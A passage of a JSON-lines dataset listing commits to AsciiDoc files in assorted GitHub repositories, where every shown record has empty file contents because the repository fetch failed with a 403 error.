--redact flag usage\n\nChange-Id: I5356aba4277fbea957289db2790ea1353bab4ba3\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/8394\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nTested-by: Kudu Jenkins\n","repos":"InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu","old_file":"docs\/security.adoc","new_file":"docs\/security.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 
403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"56721d601d94d433b7478190ba09a0557fd6aa1d","subject":"Add notes on secure deployment","message":"Add notes on secure deployment\n","repos":"advancedtelematic\/sota_client_cpp,advancedtelematic\/aktualizr,advancedtelematic\/sota_client_cpp,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr","old_file":"docs\/security.adoc","new_file":"docs\/security.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/advancedtelematic\/sota_client_cpp.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"032ea6da1d4b9a9db644d81a4ff4aa8741a22864","subject":"Create test.adoc","message":"Create test.adoc","repos":"kdorff\/retropie-romfilter,kdorff\/retropie-romfilter","old_file":"docs\/test.adoc","new_file":"docs\/test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kdorff\/retropie-romfilter.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e3f0af275c0f4b5fbb70c8f3ae28ae358ee324c","subject":"y2b create post iPhone 6 Plus Unboxing (Shot With iPhone 6)","message":"y2b create post iPhone 6 Plus Unboxing (Shot With iPhone 6)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-09-19-iPhone-6-Plus-Unboxing-Shot-With-iPhone-6.adoc","new_file":"_posts\/2014-09-19-iPhone-6-Plus-Unboxing-Shot-With-iPhone-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0d02f88008b2dd68ea84be340736d792aaf811c","subject":"Update 2015-07-02-Hybris-E-commerce-suite.adoc","message":"Update 2015-07-02-Hybris-E-commerce-suite.adoc","repos":"jlboes\/jlboes.github.io,jlboes\/jlboes.github.io,jlboes\/jlboes.github.io","old_file":"_posts\/2015-07-02-Hybris-E-commerce-suite.adoc","new_file":"_posts\/2015-07-02-Hybris-E-commerce-suite.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jlboes\/jlboes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c95704bff4147410da408ffcd938dd337894b3da","subject":"Fixed unspecified allegory","message":"Fixed unspecified allegory\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week04.asciidoc","new_file":"asciidoc\/week04.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2bbc6ae5dc98e4aceba01da7346688a25369f113","subject":"Update 2015-10-13-HDFS-tutorial.adoc","message":"Update 2015-10-13-HDFS-tutorial.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-13-HDFS-tutorial.adoc","new_file":"_posts\/2015-10-13-HDFS-tutorial.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"3fa00dbcea990a1b3baf8f545a8d8effedfd3bd4","subject":"Update 2016-10-03-Roman-Weekend.adoc","message":"Update 2016-10-03-Roman-Weekend.adoc","repos":"cmhgroupllc\/blog,cmhgroupllc\/blog,cmhgroupllc\/blog,cmhgroupllc\/blog","old_file":"_posts\/2016-10-03-Roman-Weekend.adoc","new_file":"_posts\/2016-10-03-Roman-Weekend.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmhgroupllc\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be923ab8f7c79a00773c654ca86bb6a6b2ad17ae","subject":"Update 2017-08-14-Cloud-Spanner.adoc","message":"Update 2017-08-14-Cloud-Spanner.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-14-Cloud-Spanner.adoc","new_file":"_posts\/2017-08-14-Cloud-Spanner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0e6ad849ca98211f21eb23ad2633d5494f94de0","subject":"Update 2017-11-08-api-blueprint.adoc","message":"Update 2017-11-08-api-blueprint.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-08-api-blueprint.adoc","new_file":"_posts\/2017-11-08-api-blueprint.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9c15572c8fa6ebb7becd57578833d4ea9d391755","subject":"add a new readme","message":"add a new readme\n","repos":"ozlerhakan\/rapid,ozlerhakan\/rapid,ozlerhakan\/rapid","old_file":"react\/readme.adoc","new_file":"react\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ozlerhakan\/rapid.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b11e3c931c1ebd7e50982b6255b61f4a15e0ee79","subject":"Update 2016-11-14-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","message":"Update 2016-11-14-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-11-14-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","new_file":"_posts\/2016-11-14-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"acc5544c17523d2387c9ce115c526e1f7577cdcc","subject":"Update 2018-05-18-I-was-involved-in-a-shocking-incident-and-want-to-talk-about-mental-health-and-what-were-doing-as-a-country-to-address-it.adoc","message":"Update 
2018-05-18-I-was-involved-in-a-shocking-incident-and-want-to-talk-about-mental-health-and-what-were-doing-as-a-country-to-address-it.adoc","repos":"msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com","old_file":"_posts\/2018-05-18-I-was-involved-in-a-shocking-incident-and-want-to-talk-about-mental-health-and-what-were-doing-as-a-country-to-address-it.adoc","new_file":"_posts\/2018-05-18-I-was-involved-in-a-shocking-incident-and-want-to-talk-about-mental-health-and-what-were-doing-as-a-country-to-address-it.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/msavy\/rhymewithgravy.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c02f5119e8926a4d23ba8c02303cf60f49923e0e","subject":"Started asciidoc based user guide.","message":"Started asciidoc based user guide.\n","repos":"miyakawataku\/jsr354-ri,miyakawataku\/jsr354-ri,msgilligan\/jsr354-ri,msgilligan\/jsr354-ri","old_file":"src\/main\/asciidoc\/userguide.adoc","new_file":"src\/main\/asciidoc\/userguide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/msgilligan\/jsr354-ri.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"207cb0debaba186b304b931c94d921528d757bed","subject":"y2b create post Ultimate Portable Setup?","message":"y2b create post Ultimate Portable Setup?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-08-26-Ultimate-Portable-Setup.adoc","new_file":"_posts\/2015-08-26-Ultimate-Portable-Setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"895526ed706e28791cb25dd65ec550a045f6a3d6","subject":"Update 2018-09-06-A-W-S-A-L-B-Java-Script.adoc","message":"Update 2018-09-06-A-W-S-A-L-B-Java-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-06-A-W-S-A-L-B-Java-Script.adoc","new_file":"_posts\/2018-09-06-A-W-S-A-L-B-Java-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf2ce9ce1585f5e1d816e12520da91561d3b0bb5","subject":"Update 2015-09-18-YourSingapore-Mobile-App.adoc","message":"Update 2015-09-18-YourSingapore-Mobile-App.adoc","repos":"MirumSG\/agencyshowcase,MirumSG\/agencyshowcase,MirumSG\/agencyshowcase","old_file":"_posts\/2015-09-18-YourSingapore-Mobile-App.adoc","new_file":"_posts\/2015-09-18-YourSingapore-Mobile-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MirumSG\/agencyshowcase.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f0dee1fe0bcb55c592c39a1db54f647d97fd98c","subject":"Update 2016-05-25-A-mozhet-nu-ego-etot-ORM.adoc","message":"Update 
2016-05-25-A-mozhet-nu-ego-etot-ORM.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2016-05-25-A-mozhet-nu-ego-etot-ORM.adoc","new_file":"_posts\/2016-05-25-A-mozhet-nu-ego-etot-ORM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e5d910cf98b8c394c820d715803c66124409347","subject":"Add example document for attribute entries & their usage","message":"Add example document for attribute entries & their usage\n","repos":"edusantana\/asciidoc-highlight","old_file":"test\/issues\/14.adoc","new_file":"test\/issues\/14.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/edusantana\/asciidoc-highlight.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d6f0d4af03ccc7d3cfd768e237c46c78e2bea76","subject":"Publish 2016-08-09.adoc","message":"Publish 2016-08-09.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-08-09.adoc","new_file":"2016-08-09.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5517e86599360562f357b1e09304e894002a25c9","subject":"Update 2015-07-05-First-Rust-project-wf.adoc","message":"Update 2015-07-05-First-Rust-project-wf.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2015-07-05-First-Rust-project-wf.adoc","new_file":"_posts\/2015-07-05-First-Rust-project-wf.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0fd660db7a858987297e220dfa3c4ad94d860be4","subject":"Update 2016-05-03-Intellectual-Property.adoc","message":"Update 2016-05-03-Intellectual-Property.adoc","repos":"wattsap\/wattsap.github.io,wattsap\/wattsap.github.io,wattsap\/wattsap.github.io,wattsap\/wattsap.github.io","old_file":"_posts\/2016-05-03-Intellectual-Property.adoc","new_file":"_posts\/2016-05-03-Intellectual-Property.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wattsap\/wattsap.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6132b0a1ac9191e88c8b395849b2af4b1bf772ca","subject":"Update 2016-11-15-Inky-Machine-Learning.adoc","message":"Update 2016-11-15-Inky-Machine-Learning.adoc","repos":"triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io","old_file":"_posts\/2016-11-15-Inky-Machine-Learning.adoc","new_file":"_posts\/2016-11-15-Inky-Machine-Learning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/triskell\/triskell.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd3f3a850ed68015b1221aa7a589383e7728437b","subject":"Update 2016-12-02-exhibition-booth-tour.adoc","message":"Update 
2016-12-02-exhibition-booth-tour.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-02-exhibition-booth-tour.adoc","new_file":"_posts\/2016-12-02-exhibition-booth-tour.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b323c5ed58d51576e67672fd92e331b799048cd6","subject":"Update 2017-09-17-mixed-content-checker.adoc","message":"Update 2017-09-17-mixed-content-checker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-17-mixed-content-checker.adoc","new_file":"_posts\/2017-09-17-mixed-content-checker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"51bb0f68418382508038c97ba2d663defc0d38ab","subject":"job: #9893 introducing review minute template","message":"job: #9893 introducing review minute template\n","repos":"cortlandstarrett\/mc,leviathan747\/mc,leviathan747\/mc,leviathan747\/mc,rmulvey\/mc,cortlandstarrett\/mc,rmulvey\/mc,xtuml\/mc,lwriemen\/mc,keithbrown\/mc,keithbrown\/mc,rmulvey\/mc,leviathan747\/mc,lwriemen\/mc,cortlandstarrett\/mc,lwriemen\/mc,cortlandstarrett\/mc,rmulvey\/mc,leviathan747\/mc,lwriemen\/mc,leviathan747\/mc,cortlandstarrett\/mc,keithbrown\/mc,xtuml\/mc,keithbrown\/mc,lwriemen\/mc,keithbrown\/mc,keithbrown\/mc,xtuml\/mc,lwriemen\/mc,rmulvey\/mc,xtuml\/mc,xtuml\/mc,cortlandstarrett\/mc,rmulvey\/mc,xtuml\/mc","old_file":"doc\/review-minutes\/9893_xtuml2masl_int_rvm.adoc","new_file":"doc\/review-minutes\/9893_xtuml2masl_int_rvm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/leviathan747\/mc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"35688a5cb8902dae4458259171dc219236006275","subject":"Works on documentation","message":"Works on documentation\n","repos":"endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox","old_file":"doc\/manpage\/tm_mib.adoc","new_file":"doc\/manpage\/tm_mib.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/endurox-dev\/endurox.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"39168abfef17e4d2f78c76294321e367bf8c4859","subject":"Trailing slashes for URL validation","message":"Trailing slashes for URL validation\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Automated Eclipse install.adoc","new_file":"Automated Eclipse install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a939b56e60e7af96d947bd8d2a23e4b637d9551d","subject":"y2b create post Do You Even Cloud Bro?","message":"y2b create post Do You Even Cloud 
Bro?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-12-18-Do-You-Even-Cloud-Bro.adoc","new_file":"_posts\/2015-12-18-Do-You-Even-Cloud-Bro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3479e272a0ac6da8ecfc16d0c4ceeb7f783a7c7","subject":"Update 2017-02-20-Sala-de-Chat-Privado3.adoc","message":"Update 2017-02-20-Sala-de-Chat-Privado3.adoc","repos":"txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io","old_file":"_posts\/2017-02-20-Sala-de-Chat-Privado3.adoc","new_file":"_posts\/2017-02-20-Sala-de-Chat-Privado3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/txemis\/txemis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a7b57743f6fd5afec65ef81bf8595960dfe7088e","subject":"Installing Grails common snippet","message":"Installing Grails common snippet\n","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-installingGrails.adoc","new_file":"src\/main\/docs\/common-installingGrails.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"05a6654faa577a87150db644bf970db8952067cc","subject":"Update 2015-02-20-Mistaken-Million.adoc","message":"Update 2015-02-20-Mistaken-Million.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2015-02-20-Mistaken-Million.adoc","new_file":"_posts\/2015-02-20-Mistaken-Million.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cab88432ccd7e9d29821fe8e2dfce15878d2e167","subject":"fixed a silly mistake","message":"fixed a silly mistake\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week03.asciidoc","new_file":"asciidoc\/week03.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"936a2d44053376031ed8cfea25de3d810df003a4","subject":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","message":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49e7c0d6192e7e4f15c9a4577e095c02b2e0b137","subject":"Update 2016-04-08-2016-04-06.adoc","message":"Update 
2016-04-08-2016-04-06.adoc","repos":"nichijo-chuka\/nichijo-chuka.github.io,nichijo-chuka\/nichijo-chuka.github.io,nichijo-chuka\/nichijo-chuka.github.io,nichijo-chuka\/nichijo-chuka.github.io","old_file":"_posts\/2016-04-08-2016-04-06.adoc","new_file":"_posts\/2016-04-08-2016-04-06.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nichijo-chuka\/nichijo-chuka.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4ff0bae9b7f59a3a1f0c116eda1d9bcd261a32b0","subject":"DOC: add page with user feedback","message":"DOC: add page with user feedback\n","repos":"remkop\/picocli,remkop\/picocli,remkop\/picocli,remkop\/picocli","old_file":"docs\/feedback.adoc","new_file":"docs\/feedback.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remkop\/picocli.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"68069c28fe47148adff41e484062bcd40deeb8d3","subject":"added some POC for doc on website","message":"added some POC for doc on website\n","repos":"squirrelala\/Rainfall-core,cschanck\/Rainfall-core,cschanck\/Rainfall-core,cljohnso\/Rainfall-core,cljohnso\/Rainfall-core,squirrelala\/Rainfall-core,aurbroszniowski\/Rainfall-core,aurbroszniowski\/Rainfall-core","old_file":"src\/main\/doc\/index.adoc","new_file":"src\/main\/doc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cschanck\/Rainfall-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"df1485a47008a3cd0fe24e03ed6d9689c82e7362","subject":"Update 2015-11-26-Inverser-le-controle.adoc","message":"Update 2015-11-26-Inverser-le-controle.adoc","repos":"Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io","old_file":"_posts\/2015-11-26-Inverser-le-controle.adoc","new_file":"_posts\/2015-11-26-Inverser-le-controle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vtek\/vtek.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d7ece3edd329488ffad045f3c8d4223335753a2","subject":"Update 2016-10-18-Le-Inicio-da-Marmota.adoc","message":"Update 2016-10-18-Le-Inicio-da-Marmota.adoc","repos":"ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io","old_file":"_posts\/2016-10-18-Le-Inicio-da-Marmota.adoc","new_file":"_posts\/2016-10-18-Le-Inicio-da-Marmota.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ricardozanini\/ricardozanini.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee5a6f1eb1007a1cbf20e20c6b56a123829d323f","subject":"link should be copyable, not clickable","message":"link should be copyable, not 
clickable\n","repos":"asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin","old_file":"doc\/contributors-guide\/modules\/ROOT\/pages\/user\/add-eap-repository-to-ide.adoc","new_file":"doc\/contributors-guide\/modules\/ROOT\/pages\/user\/add-eap-repository-to-ide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/asciidoctor\/asciidoctor-intellij-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"90ca525deb475b62d2ff256212637ee15c03c1df","subject":"BVAL-687 Adding final license","message":"BVAL-687 Adding final license\n","repos":"beanvalidation\/beanvalidation-spec,beanvalidation\/beanvalidation-spec,beanvalidation\/beanvalidation-spec","old_file":"sources\/license-final.asciidoc","new_file":"sources\/license-final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/beanvalidation\/beanvalidation-spec.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"81bea9667e78c55c9609e05d4909eb66bc85ccd4","subject":"added readme","message":"added readme\n","repos":"fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss","old_file":"quarkus\/microprofile-rest-client\/readme.adoc","new_file":"quarkus\/microprofile-rest-client\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fmarchioni\/mastertheboss.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"82043f356f55fc3dc42a944062fdc81b302def2f","subject":"Update 2015-03-14-Using-the-Filter-in-Angularjs.adoc","message":"Update 2015-03-14-Using-the-Filter-in-Angularjs.adoc","repos":"devkamboj\/devkamboj.github.io,devkamboj\/devkamboj.github.io,devkamboj\/devkamboj.github.io,devkamboj\/devkamboj.github.io","old_file":"_posts\/2015-03-14-Using-the-Filter-in-Angularjs.adoc","new_file":"_posts\/2015-03-14-Using-the-Filter-in-Angularjs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devkamboj\/devkamboj.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"98614402b41728fe53a7078e9508cbca1200de3e","subject":"Create ommon-grailsApplicationForge5.adoc","message":"Create ommon-grailsApplicationForge5.adoc","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/ommon-grailsApplicationForge5.adoc","new_file":"src\/main\/docs\/ommon-grailsApplicationForge5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ac56424daac5d7225be24e5a675ca1758947393a","subject":"README.adoc","message":"README.adoc\n","repos":"xurei\/noip_auto_renew,xurei\/noip_auto_renew","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xurei\/noip_auto_renew.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
